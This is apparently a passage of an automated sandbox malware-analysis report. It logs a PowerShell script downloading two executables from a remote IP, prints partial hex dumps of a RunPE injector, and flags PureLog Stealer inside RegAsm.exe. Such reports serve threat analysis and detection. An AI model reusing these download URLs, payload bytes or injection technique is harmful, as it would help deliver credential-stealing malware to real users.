                        Sep 25, 2024 14:49:33.636584044 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.637919903 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.637933016 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.637969017 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.639504910 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.639518023 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.639528036 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.639549971 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.639568090 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.641078949 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.641091108 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.641133070 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.642309904 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.642322063 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.642330885 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.642355919 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.643840075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.643852949 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.643891096 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.645253897 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.645265102 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.645275116 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.645299911 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.645317078 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.647181034 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.647197962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.647243023 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.648380041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.648391962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.648402929 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.648427963 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.650371075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.650382042 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.650410891 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.651902914 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.651915073 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.651959896 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.654433966 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.654445887 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.654512882 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.655297041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.655308962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.655318975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.655345917 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.655361891 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.658293009 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.658304930 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.658344984 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.658966064 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.658977985 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.659015894 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.662103891 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.662117004 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.662156105 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.662538052 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.662549973 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.662559986 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.662583113 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.666207075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.666218996 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.666258097 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.666522026 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.666533947 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.666543961 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.666568995 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.666584015 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.670511961 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.670531034 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.670540094 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.670569897 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.670967102 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.670979977 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.671010971 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.675345898 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.675358057 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.675368071 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.675416946 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.675435066 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.675937891 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.676692963 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.676702023 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.676747084 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.679708004 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.679719925 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.679759979 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.681298971 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.681312084 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.681344032 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.683698893 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.683711052 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.683721066 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.683747053 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.683769941 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.685723066 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.685735941 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.685770035 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.687819958 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.687832117 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.687875032 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.689776897 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.689795017 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.689851046 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.692306995 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.692318916 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.692328930 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.692368031 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.693437099 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.693449974 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.693484068 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.696204901 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.696217060 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.696274996 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.697077990 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.697089911 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.697127104 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.703398943 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703409910 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703421116 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703432083 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703443050 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703453064 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.703470945 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.703490019 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.703771114 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703782082 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.703830004 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.706329107 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.706513882 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.706559896 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.710376024 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.710388899 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.710431099 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.711617947 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.711630106 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.711639881 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.711668968 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.712241888 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.712291002 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.737613916 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.782916069 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.989018917 CEST4971180192.168.2.6147.45.44.131
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 25, 2024 14:50:11.907932997 CEST5351685162.159.36.2192.168.2.6
                        Sep 25, 2024 14:50:12.391355038 CEST53542791.1.1.1192.168.2.6
                        • 147.45.44.131
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649711147.45.44.131806324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 25, 2024 14:49:31.928517103 CEST76OUTGET /files/TTF.exe HTTP/1.1
                        Host: 147.45.44.131
                        Connection: Keep-Alive
                        Sep 25, 2024 14:49:32.616590977 CEST1236INHTTP/1.1 200 OK
                        Date: Wed, 25 Sep 2024 12:49:32 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Last-Modified: Mon, 12 Aug 2024 11:56:41 GMT
                        ETag: "3400-61f7b2fb281f0"
                        Accept-Ranges: bytes
                        Content-Length: 13312
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdos-program
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 36 0c fa 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 2a 00 00 00 08 00 00 00 00 00 00 4a 49 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f6 48 00 00 4f 00 00 00 00 60 00 00 8c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 60 48 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY6"0*JI `@ `HO``H8 H.textP) * `.rsrc`,@@.reloc2@B*IHh)07(}}}|(+|(*(*.s*rp(-rp(-+rp*rp**(*0/(}}|(+|(*(*0(o( *&(!rp("%%(o#**&(!rp("%%(o#
                        Sep 25, 2024 14:49:32.616890907 CEST1236INData Raw: 28 00 00 01 2a 00 13 30 06 00 79 00 00 00 04 00 00 11 d0 26 00 00 01 28 21 00 00 0a 28 24 00 00 0a 0a 16 8d 2b 00 00 01 0b 16 0c 2b 56 06 08 9a 6f 25 00 00 0a 72 eb 00 00 70 28 1b 00 00 0a 2c 3e 06 08 9a 6f 26 00 00 0a 16 9a 6f 27 00 00 0a 6f 25
                        Data Ascii: (*0y&(!($++Vo%rp(,>o&o'o%rp(,%(o#tXi2*0k%%rp%rp%r'p%rAp%rmp%rp%rp%rp%rp%r!p%
                        Sep 25, 2024 14:49:32.616905928 CEST448INData Raw: 00 00 00 00 00 00 34 00 00 00 41 03 00 00 75 03 00 00 18 00 00 00 10 00 00 01 1e 02 28 19 00 00 0a 2a 13 30 03 00 f4 00 00 00 00 00 00 00 28 0c 00 00 06 16 9a 28 0c 00 00 06 18 9a 28 03 00 00 2b 80 02 00 00 04 28 0c 00 00 06 16 9a 28 0c 00 00 06
                        Data Ascii: 4Au(*0(((+(((+(((+(((+(((+(((+(((+(((+(
                        Sep 25, 2024 14:49:32.618818998 CEST1236INData Raw: de 17 0d 02 1f fe 7d 0e 00 00 04 02 7c 0f 00 00 04 09 28 37 00 00 0a de 14 02 1f fe 7d 0e 00 00 04 02 7c 0f 00 00 04 07 28 38 00 00 0a 2a 01 10 00 00 00 00 07 00 6d 74 00 17 19 00 00 01 36 02 7c 0f 00 00 04 03 28 39 00 00 0a 2a 00 00 1b 30 03 00
                        Data Ascii: }|(7}|(8*mt6|(9*0{,I~(}~(o3(4-<%}}|(+c{|%}(6{(}}|
                        Sep 25, 2024 14:49:32.618838072 CEST1236INData Raw: e0 01 01 00 5e 00 ca 01 01 00 1f 00 d8 01 26 00 c3 01 e4 00 26 00 92 01 e4 00 26 00 05 01 e4 01 21 00 fc 00 e4 01 06 00 73 05 e4 01 21 00 54 00 ca 01 21 00 b6 06 ca 01 21 00 d8 01 ca 01 21 10 f7 00 e7 01 21 00 83 00 e4 00 21 00 08 09 e4 00 21 00
                        Data Ascii: ^&&&!s!T!!!!!!!;P D J D !D !?!s!{!
                        Sep 25, 2024 14:49:32.618995905 CEST1236INData Raw: 01 00 91 08 00 00 02 00 75 01 00 00 01 00 35 01 00 00 02 00 50 09 00 00 01 00 35 01 00 00 02 00 50 09 00 00 03 00 d0 05 00 00 04 00 91 08 00 00 01 00 d6 08 00 00 01 00 91 08 00 00 02 00 75 01 00 00 01 00 35 01 00 00 02 00 50 09 00 00 01 00 35 01
                        Data Ascii: u5P5Pu5P5Puz^z^uWnmW
                        Sep 25, 2024 14:49:32.619010925 CEST272INData Raw: 00 00 00 00 00 00 90 01 cb 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 90 01 fb 05 00 00 00 00 07 00 02 00 08 00 04 00 09 00 05 00 0a 00 05 00 0b 00 05 00 0c 00 05 00 0d 00 05 00 0e 00 05 00 0f 00 05 00 10 00 05 00 11 00 05 00 12 00 05 00
                        Data Ascii: /C;a$kiu<Main>d__0<LinkGetAsync>d__1<>u__1Task`1AsyncTaskMethodBuilder`1TaskAwaiter`1R
                        Sep 25, 2024 14:49:32.619029045 CEST1236INData Raw: 54 6f 55 49 6e 74 33 32 00 54 6f 49 6e 74 33 32 00 52 65 73 65 72 76 65 64 32 00 54 6f 49 6e 74 31 36 00 3c 4d 6f 64 75 6c 65 3e 00 3c 4d 61 69 6e 3e 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 52 75 6e
                        Data Ascii: ToUInt32ToInt32Reserved2ToInt16<Module><Main>CreateProcessALoadLibraryARunPEURLmscorlibDownloadDataTaskAsyncLinkGetAsyncMiscThreadIdProcessIdGetProcessByIdbytesReadResumeThreadthreadpayloadAwaitUnsafeOnCompletedget_IsComp
                        Sep 25, 2024 14:49:32.620333910 CEST1236INData Raw: 00 45 78 65 63 75 74 65 00 42 79 74 65 00 76 61 6c 75 65 00 52 75 6e 50 45 2e 65 78 65 00 67 65 74 5f 53 69 7a 65 00 62 75 66 66 65 72 53 69 7a 65 00 53 69 7a 65 4f 66 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 56 65 72 73 69 6f 6e 69 6e 67
                        Data Ascii: ExecuteBytevalueRunPE.exeget_SizebufferSizeSizeOfSystem.Runtime.VersioningStringpathlengthLoadApiCreateApiUriAsyncCallbackcallbackget_TaskMarshalKillUrlProgramSystembytesWrittenMainStartupInformationProcessInformation
                        Sep 25, 2024 14:49:32.620352030 CEST1236INData Raw: 2e 00 33 00 30 00 33 00 31 00 39 00 5c 00 52 00 65 00 67 00 41 00 73 00 6d 00 2e 00 65 00 78 00 65 00 00 41 43 00 3a 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 73 00 63 00 68 00
                        Data Ascii: .30319\RegAsm.exeAC:\Windows\System32\schtasks.exeToInt16ToInt32GetBytesInt32kernel32ntdllResumeThread+Wow64SetThre
                        Sep 25, 2024 14:49:32.621844053 CEST1236INData Raw: 00 02 01 0e 1d 05 05 20 02 01 1c 18 04 20 01 08 18 0a 20 03 12 80 89 18 12 80 8d 1c 06 20 01 08 12 80 89 06 20 02 02 18 1d 08 0c 20 04 12 80 89 18 1d 08 12 80 8d 1c 06 20 01 02 12 80 89 08 20 05 08 18 08 08 08 08 0e 20 07 12 80 89 18 08 08 08 08
                        Data Ascii: PL PL PL
                        Sep 25, 2024 14:49:32.820904970 CEST59OUTGET /files/mservice64.exe HTTP/1.1
                        Host: 147.45.44.131
                        Sep 25, 2024 14:49:33.016813993 CEST1236INHTTP/1.1 200 OK
                        Date: Wed, 25 Sep 2024 12:49:32 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Last-Modified: Mon, 12 Aug 2024 11:55:19 GMT
                        ETag: "a7000-61f7b2acc379e"
                        Accept-Ranges: bytes
                        Content-Length: 684032
                        Content-Type: application/x-msdos-program
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6a 65 30 a0 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 62 0a 00 00 0c 00 00 00 00 00 00 8e 81 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 81 0a 00 4b 00 00 00 00 a0 0a 00 34 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELje00b @ @@K4 H.texta b `.rsrc4d@@.relocn@BpH0Np@&*.((*(e*(*0s~%:&~+s%(+o8[o%F~(%G~(%H~(%e~(~(o8(ss@~}~s(o}{I~(o9I~(8C~(o:{~(8{~(


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:08:49:28
                        Start date:25/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000000.00000002.2236665088.000002C3EF2E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000000.00000002.2206077558.000002C3D70F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2229665328.000002C3E6FA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:08:49:28
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:08:49:33
                        Start date:25/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Imagebase:0xe00000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2213531087.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:08:49:33
                        Start date:25/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:08:49:33
                        Start date:25/09/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:5.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:12
                          Total number of Limit Nodes:0

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237323868.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34660000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e490c0e4439c43d260be9d6e9711907c0cceede0600a41ca03b6938e9036b1b3
                          • Instruction ID: a2fee526dea976a7618bf719875db83f678c4a968fe88bf05d307181f469cd56
                          • Opcode Fuzzy Hash: e490c0e4439c43d260be9d6e9711907c0cceede0600a41ca03b6938e9036b1b3
                          • Instruction Fuzzy Hash: 02C18230A18A8D4FDB75EF28C8967E977E1FF59311F10422ADC4DC7291DE78A9418B82

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237323868.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34660000_powershell.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 9195c602c019d19abc9548073151f699a79f2013d84951a76ee3ee75366a8903
                          • Instruction ID: 95de83c4ed73be3e5a2eedd81fee3a32413470af0bac14a3ae74cbd79804056f
                          • Opcode Fuzzy Hash: 9195c602c019d19abc9548073151f699a79f2013d84951a76ee3ee75366a8903
                          • Instruction Fuzzy Hash: E141D73190DB5C4FDB289F9898556EDBBE1EB55320F00426FE489D3292DE78A845C782

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237323868.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34660000_powershell.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 96d56ab7e01e18217df258c5c34c22f6b8e550966dc85c27bddcbbc81af22245
                          • Instruction ID: ca8cca166bde869595fdad6d7f102d0ed4a42745f06b12369107bd28bd8756c3
                          • Opcode Fuzzy Hash: 96d56ab7e01e18217df258c5c34c22f6b8e550966dc85c27bddcbbc81af22245
                          • Instruction Fuzzy Hash: 47310331D0CB584FDB299FA898566FABBE5EF56321F04423FD04AD3192DF78A8058781

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237323868.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34660000_powershell.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
